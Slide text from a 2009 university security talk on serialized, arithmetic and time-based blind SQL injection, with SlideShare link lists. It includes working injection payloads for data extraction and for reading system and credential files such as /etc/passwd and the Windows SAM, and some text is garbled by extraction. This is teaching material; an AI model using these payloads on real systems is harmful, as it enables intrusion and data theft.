SlideShare a Scribd company logo

Playing With (B)Sqli

Download as PPTX, PDF
Chema Alonso
Chema Alonso

Charla impartida por Chema Alonso, de Informática64, en el curso de Verando de Seguridad Informática de la Universidad de Salamanca 2009

Technology
1 of 54
(Re) Playingwith (Blind) SQL Injection Chema Alonso Informatica64 Microsoft MVP Enterprise Security
SQL Injection attacks A long time ago, in a galaxyfar, faraway… http://www.phrack.org/issues.html?id=8&issue=54
Back onthe 90s Select id fromusers_table wherelogin=‘$users’ and passw=‘$password’; User Password ****************
Back onthe 90s Select id fromusers_table wherelogin=‘Admin’ and passw=‘’ or ‘1’=‘1’; User Admin Password ‘ or ‘1’=‘1
Noteverybody….
ODBC Error messages Username: ' having 1=1-- [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. Username: ' group by users.id having 1=1-- [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. And so on…
Evensecuritycompanies: Kaspersky
Agenda Serialized SQL Injection Demo: XML Extractor Arithmetic SQL Injection Divide byZero Sums and subtractions Typeoveflow Demo RemoteFileDownloadingusingBlind SQL Injection SQL Sever MySQL Oracle Demo: RFD Tool Time-BasedBlind SQL Injectionusing heavy queries Demo: MarathonTool
Serialized SQL Injection
Serialized SQL Injection Goal: ToMergecomplexresultsets in a single showablefield XML serializationfunctionsallowtoconvert a resultsetinto a oneXML string. It´spossibletodownloadbigamount of data with single and simple injections.
SQL Server FOR XML: Retrieves data as a single stringrepresentingan XML tree. RAW: Mandatory option. Shows the information converting each row of the result set in an XML element in the form <row />. BINARY BASE64:The query will fail if we find any BINARY data type column (containing images, or passwords) if this option is not explicitly specified. union select '1','2','3',(select * from sysusers for xml raw, binary base64) XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints. Described by DaniKachakil
MySQL No default XML support, requires a server sideextension GROUP_CONCAT (v 4.1+)
Oracle xmlforest, xmlelement,… No * support
Demo: Serialized SQL Injection
ArithmeticBlind SQL Injection
Blind Attacks Attacker injects code but can´t access directly to the data. However this injection changes the behavior of the web application. Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. Blind SQL Injection Biind Xpath Injection Blind LDAP Injection
Blind SQL Injection Attacks Attacker injects: “True where clauses” “False where clauses“ Ex: Program.php?id=1 and 1=1 Program.php?id=1 and 1=2 Program doesn’t return any visible data from database or data in error messages. The attacker can´t see any data extracted from the database.
Blind SQL Injection Attacks Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: Different hashes Different html structure Different patterns (keywords) Different linear ASCII sums “Different behavior” By example: Response Time
Blind SQL Injection Attacks If any difference exists, then: Attacker can extract all information from database How? Using “booleanization” MySQL: Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) “True-Answer Page” or “False-Answer Page”? MSSQL: Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) Oracle: Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1)
Blind SQL Injection
ArithmeticBlind SQL Injection Thequeryforcestheparametertobenumeric SELECT field FROM table WHERE id=abs(param) Ex: GetParam(ID) Select ….. Where att1=abs(ID) Select ….. Where att2=k1-ID Print response Booleanlogicneedstobecreatedwithmathoperations
ArithmeticBlind SQL Injection Divide byzero (David Litchfield) Id=A+(1/(ASCII(B)-C)) A-> Paramvalueoriginallyused in thequery. B -> Valuewe are searchingfor, e.g.: Substring(passwd,1,1) C-> Counter [0..255] When ASCII(B)=C, the DB willgenerate a divide byzeroexception.
ArithmeticBlind SQL Injection Sums and subtractions Id=A+ASCII(B)-C A-> Paramvalueoriginallyused in thequery. B -> Valuewe are searchingfor, e.g.: Substring(passwd,1,1) C-> Counter [0..255] When ASCII(B)=C, thenthe response page of id=A+ASCII(B)-C willbethesame as id=A
ArithmeticBlind SQL Injection Valuetypeoverflow Id=A+((C/ASCII(B))*(K)) A-> Paramvalueoriginallyused in thequery. B -> Valuewe are searchingfor, e.g.: Substring(passwd,1,1) C-> Counter [0..255] K-> Valuethatoverflowsthetypedefinedfor A (e.g.if A isinteger, then K=2^32) When C/ASCII(B)==1, K*1 overflowsthe data type
Demo: Divide byzero Sums and subtractions Integeroverflow
RemoteFileDownloadingusingBlind SQL Injectiontechniques
Accessing Files Two ways: Load the file in a temp table and i>(select top 1 ASCII(Substring(column)(file,pos,1)) from temp_table ?? Load the file in the query With every query the file is loaded in memory I am very sorry, engine  and i>ASCII(Substring(load_file(file,pos,1))??
SQL Server 2K - External Data Sources Only for known filetypes: Access trough Drivers: Txt, csv, xls, mdb, log And 200>ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:','select top 1 * from c:irarget.txt’),1,1)) Privileges HKEY_LOCAL_MACHINEOFTWAREicrosoftSSQLServerrovidersisallowAdhocAccess=0 By default thiskeydoesn´texist so onlyuserswithServer Admin Role can use thesefunctions. NTFS permissions
SQL Server 2K – Bulk option Access to any file ; Create Table TempTable as (row varchar(8000)) -- ; Bulk Insert TempTable From 'c:ile.ext' With (FIELDTERMINATOR = '', ROWTERMINATOR = '‘) -- ; alter table TempTable add num int IDENTITY(1,1) NOT NULL – and (select COUNT(row) from TempTable) and (select top 1 len(row) from TempTable where num = rownum) and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1) ; Drop Table TempTable-- Privileges needed Server Role: Bulkadmin Database Role: db_owner o db_ddladmin NTFS permissions
SQL Server 2k5 – 2k8 OPENDATASOURCE and OPENROWSET supported Bulk options improved AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:indowsepairam', SINGLE_BLOB) As Data), 1, 1))— Permisions Bulkadmin Server Role External Data Sources enabled Sp_configure Surface configuration Tool for features
MySQL LoadFile SELECT LOAD_FILE(‘/etc/passwd’) SQLbfTools: MySQLgetcommand (illo and dab) http://www.reversing.org/node/view/11 Load Data infile ; Create table C8DFC643 (datosvarchar(4000)) ; Load data infile 'c:boot.ini' into table C8DFC643 ; alter table C8DFC643 add column num integer auto_increment unique key and (select count(num) from C8DFC643) and (select length(datos) from C8DFC643 where num = 1) and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1) ; Drop table C8DFC643
Oracle – Plain Text files External Tables ; execute immediate 'Create Directory A4A9308C As ''c:amp;apos;' '; end; -- ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;-- Only Plain Text files
Oracle – DBMS_LOB ; execute immediate ‘ DECLARE l_bfile BFILE; l_blob BLOB; BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob; l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp''); DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly); DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile)); DBMS_LOB.fileclose(l_bfile); COMMIT; EXCEPTION WHEN OTHERS THEN ROLLBACK; END;‘ ; end; --
Demo RFD
Time-basedBlind SQL Injectionusing heavy queries
Time-Based Blind SQL Injection In scenarios with no differences between “True-Answer Page” and “False-Answer Page”, time delays can be used. Injection forces a delay in the response page when the condition injected is True. - Delay functions: SQL Server: waitfor Oracle: dbms_lock.sleep MySQL: sleep or Benchmark Function Postgres: pg_sleep Ex: ; if (exists(select * fromusers)) waitfordelay '0:0:5’
Exploit for Solar Empire Web Game
Time-Based Blind SQL Injection What about databases engines without delay functions, i.e., MS Access, Oracle connection without PL/SQL support, DB2, etc…? Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks?
Yes, we can!
“Where-Clause” execution order Select “whatever “ From whatever Where condition1 and condition2 - Condition1 lasts 10 seconds - Condition2 lasts 100 seconds Which condition should be executed first?
The heavy condition first
The light condition first
Time-Based Blind SQL Injectionusing Heavy Queries Attacker can perform an exploitation delaying the “True-answer page” using a heavy query. It depends on how the database engine evaluates the where clauses in the query. There are two types of database engines: Databases without optimization process Databases with optimization process
Time-Based Blind SQL Injectionusing Heavy Queries Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. The Cross-join injection must be heavier than the other condition. Attacker only have to know or to guess the name of a table with select permission in the database. Example in MSSQL: Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
“Default” tablestoconstruct a heavy query Microsoft SQL Server sysusers Oracle all_users MySQL (versión 5) information_schema.columns Microsoft Access MSysAccessObjects (97 & 2000 versions) MSysAccessStorage (2003 & 2007) 45
“Default” tablestoconstruct a heavy query …or whatever you can guess Clients Customers News Logins Users Providers ….Use your imagination…
Ex 1: MS SQL Server Query takes 14 seconds -> True-Answer
Ex 1: MS SQL Server Query takes 1 second -> False-Answer
Ex 2: Oracle Query Takes 22 seconds –> True-Answer
Ex 2: Oracle Query Takes 1 second –> False-Answer
Ex 3: Access 2007 Query Takes 39 seconds –> True-Answer
Ex 3: Access 2007 Query Takes 1 second –> False-Answer
Marathon Tool Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases. Schema Extraction from known databases Extract data using heavy queries not matter in which database engine (without schema) Developed in .NET Source code available http://www.codeplex.com/marathontool
Demo: Marathon Tool

Recommended

Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and FallaciesKarwin Software Solutions LLC
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlChema Alonso
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection TutorialMagno Logan
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL InjectionFrancisco Ribeiro
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Nuno Loureiro
 

Recommended

Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and FallaciesKarwin Software Solutions LLC
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlChema Alonso
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection TutorialMagno Logan
 
Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Advanced SQL injection to operating system full control (slides)
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL InjectionFrancisco Ribeiro
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Nuno Loureiro
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingChema Alonso
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1Bernardo Damele A. G.
 
ORM Injection
ORM InjectionORM Injection
ORM InjectionSimone Onofri
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Codemotion 2013: Feliz 15 aniversario, SQL Injection
Codemotion 2013: Feliz 15 aniversario, SQL InjectionCodemotion 2013: Feliz 15 aniversario, SQL Injection
Codemotion 2013: Feliz 15 aniversario, SQL InjectionChema Alonso
 
Rapid prototyping search applications with solr
Rapid prototyping search applications with solrRapid prototyping search applications with solr
Rapid prototyping search applications with solrLucidworks (Archived)
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAbhinav Nair
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17Eoin Keary
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Sq linjection
Sq linjectionSq linjection
Sq linjectionMahesh Gupta (DBATAG) - SQL Server Consultant
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
Asp
AspAsp
AspAdil Jafri
 
Appreciative Advanced Blind SQLI Attack
Appreciative Advanced Blind SQLI AttackAppreciative Advanced Blind SQLI Attack
Appreciative Advanced Blind SQLI Attackijtsrd
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
Full MSSQL Injection PWNage
Full MSSQL Injection PWNageFull MSSQL Injection PWNage
Full MSSQL Injection PWNagePrathan Phongthiproek
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicJW CyberNerd
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
JTRIG (Joint Threat Research Intelligence Group) Spying Tools
JTRIG (Joint Threat Research Intelligence Group) Spying ToolsJTRIG (Joint Threat Research Intelligence Group) Spying Tools
JTRIG (Joint Threat Research Intelligence Group) Spying ToolsChema Alonso
 
Owning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnetsOwning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnetsChema Alonso
 

More Related Content

What's hot

Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingChema Alonso
 
Codemotion 2013: Feliz 15 aniversario, SQL Injection
Codemotion 2013: Feliz 15 aniversario, SQL InjectionCodemotion 2013: Feliz 15 aniversario, SQL Injection
Codemotion 2013: Feliz 15 aniversario, SQL InjectionChema Alonso
 
Rapid prototyping search applications with solr
Rapid prototyping search applications with solrRapid prototyping search applications with solr
Rapid prototyping search applications with solrLucidworks (Archived)
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17Eoin Keary
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
Appreciative Advanced Blind SQLI Attack
Appreciative Advanced Blind SQLI AttackAppreciative Advanced Blind SQLI Attack
Appreciative Advanced Blind SQLI Attackijtsrd
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicJW CyberNerd
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 

What's hot (20)

Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File Downloading
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
ORM Injection
ORM InjectionORM Injection
ORM Injection
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
Codemotion 2013: Feliz 15 aniversario, SQL Injection
Codemotion 2013: Feliz 15 aniversario, SQL InjectionCodemotion 2013: Feliz 15 aniversario, SQL Injection
Codemotion 2013: Feliz 15 aniversario, SQL Injection
 
Rapid prototyping search applications with solr
Rapid prototyping search applications with solrRapid prototyping search applications with solr
Rapid prototyping search applications with solr
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasures
 
Asp
AspAsp
Asp
 
Appreciative Advanced Blind SQLI Attack
Appreciative Advanced Blind SQLI AttackAppreciative Advanced Blind SQLI Attack
Appreciative Advanced Blind SQLI Attack
 
Sql injection
Sql injectionSql injection
Sql injection
 
Full MSSQL Injection PWNage
Full MSSQL Injection PWNageFull MSSQL Injection PWNage
Full MSSQL Injection PWNage
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORM
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? Infographic
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads Up
 

Viewers also liked

JTRIG (Joint Threat Research Intelligence Group) Spying Tools
JTRIG (Joint Threat Research Intelligence Group) Spying ToolsJTRIG (Joint Threat Research Intelligence Group) Spying Tools
JTRIG (Joint Threat Research Intelligence Group) Spying ToolsChema Alonso
 
Owning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnetsOwning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnetsChema Alonso
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesChema Alonso
 
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersHow "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersChema Alonso
 
Auditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase IIAuditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase IIChema Alonso
 
Hachetetepé dos puntos SLAAC SLAAC
Hachetetepé dos puntos SLAAC SLAACHachetetepé dos puntos SLAAC SLAAC
Hachetetepé dos puntos SLAAC SLAACChema Alonso
 
Connection String Parameter Pollution Attacks
Connection String Parameter Pollution AttacksConnection String Parameter Pollution Attacks
Connection String Parameter Pollution AttacksChema Alonso
 
Codemotion ES 2014: Love Always Takes Care & Humility
Codemotion ES 2014: Love Always Takes Care & HumilityCodemotion ES 2014: Love Always Takes Care & Humility
Codemotion ES 2014: Love Always Takes Care & HumilityChema Alonso
 
Defcon 21 - Fear the Evil FOCA: mitm attacks using IPv6
Defcon 21 - Fear the Evil FOCA: mitm attacks using IPv6Defcon 21 - Fear the Evil FOCA: mitm attacks using IPv6
Defcon 21 - Fear the Evil FOCA: mitm attacks using IPv6Chema Alonso
 
Circuitos de Video Vigilancia IP
Circuitos de Video Vigilancia IPCircuitos de Video Vigilancia IP
Circuitos de Video Vigilancia IPChema Alonso
 
Tu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu WindowsTu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu WindowsChema Alonso
 
FC00::1 (Algunos) Ataques en IPv6
FC00::1 (Algunos) Ataques en IPv6FC00::1 (Algunos) Ataques en IPv6
FC00::1 (Algunos) Ataques en IPv6Chema Alonso
 
Trends in network security feinstein - informatica64
Trends in network security feinstein - informatica64Trends in network security feinstein - informatica64
Trends in network security feinstein - informatica64Chema Alonso
 
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big DataCazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big DataChema Alonso
 
Informática64 - Metadata Security
Informática64 - Metadata SecurityInformática64 - Metadata Security
Informática64 - Metadata SecurityChema Alonso
 
Microsoft Technet - Microsoft Forefront
Microsoft Technet - Microsoft ForefrontMicrosoft Technet - Microsoft Forefront
Microsoft Technet - Microsoft ForefrontChema Alonso
 

Viewers also liked (17)

JTRIG (Joint Threat Research Intelligence Group) Spying Tools
JTRIG (Joint Threat Research Intelligence Group) Spying ToolsJTRIG (Joint Threat Research Intelligence Group) Spying Tools
JTRIG (Joint Threat Research Intelligence Group) Spying Tools
 
Owning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnetsOwning bad guys {and mafia} with javascript botnets
Owning bad guys {and mafia} with javascript botnets
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy Queries
 
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersHow "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scanners
 
Auditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase IIAuditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase II
 
Hachetetepé dos puntos SLAAC SLAAC
Hachetetepé dos puntos SLAAC SLAACHachetetepé dos puntos SLAAC SLAAC
Hachetetepé dos puntos SLAAC SLAAC
 
Defcon 18: FOCA 2
Defcon 18: FOCA 2Defcon 18: FOCA 2
Defcon 18: FOCA 2
 
Connection String Parameter Pollution Attacks
Connection String Parameter Pollution AttacksConnection String Parameter Pollution Attacks
Connection String Parameter Pollution Attacks
 
Codemotion ES 2014: Love Always Takes Care & Humility
Codemotion ES 2014: Love Always Takes Care & HumilityCodemotion ES 2014: Love Always Takes Care & Humility
Codemotion ES 2014: Love Always Takes Care & Humility
 
Defcon 21 - Fear the Evil FOCA: mitm attacks using IPv6
Defcon 21 - Fear the Evil FOCA: mitm attacks using IPv6Defcon 21 - Fear the Evil FOCA: mitm attacks using IPv6
Defcon 21 - Fear the Evil FOCA: mitm attacks using IPv6
 
Circuitos de Video Vigilancia IP
Circuitos de Video Vigilancia IPCircuitos de Video Vigilancia IP
Circuitos de Video Vigilancia IP
 
Tu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu WindowsTu iPhone es tan (in)seguro como tu Windows
Tu iPhone es tan (in)seguro como tu Windows
 
FC00::1 (Algunos) Ataques en IPv6
FC00::1 (Algunos) Ataques en IPv6FC00::1 (Algunos) Ataques en IPv6
FC00::1 (Algunos) Ataques en IPv6
 
Trends in network security feinstein - informatica64
Trends in network security feinstein - informatica64Trends in network security feinstein - informatica64
Trends in network security feinstein - informatica64
 
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big DataCazando Cibercriminales con: OSINT + Cloud Computing + Big Data
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
 
Informática64 - Metadata Security
Informática64 - Metadata SecurityInformática64 - Metadata Security
Informática64 - Metadata Security
 
Microsoft Technet - Microsoft Forefront
Microsoft Technet - Microsoft ForefrontMicrosoft Technet - Microsoft Forefront
Microsoft Technet - Microsoft Forefront
 

Similar to Playing With (B)Sqli

Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv OwaspAung Khant
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionChema Alonso
 
How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your databaseMostafa Siraj
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSiddhesh Bhobe
 
Python RESTful webservices with Python: Flask and Django solutions
Python RESTful webservices with Python: Flask and Django solutionsPython RESTful webservices with Python: Flask and Django solutions
Python RESTful webservices with Python: Flask and Django solutionsSolution4Future
 
Exploring Symfony's Code
Exploring Symfony's CodeExploring Symfony's Code
Exploring Symfony's CodeWildan Maulana
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Indexwebhostingguy
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-onAndrea Valenza
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormguest785f78
 

Similar to Playing With (B)Sqli (20)

Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
 
How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your database
 
SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL2SPARQL
SQL2SPARQLSQL2SPARQL
SQL2SPARQL
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
PHP FUNCTIONS
PHP FUNCTIONSPHP FUNCTIONS
PHP FUNCTIONS
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
 
Sql injection
Sql injectionSql injection
Sql injection
 
Mysql
MysqlMysql
Mysql
 
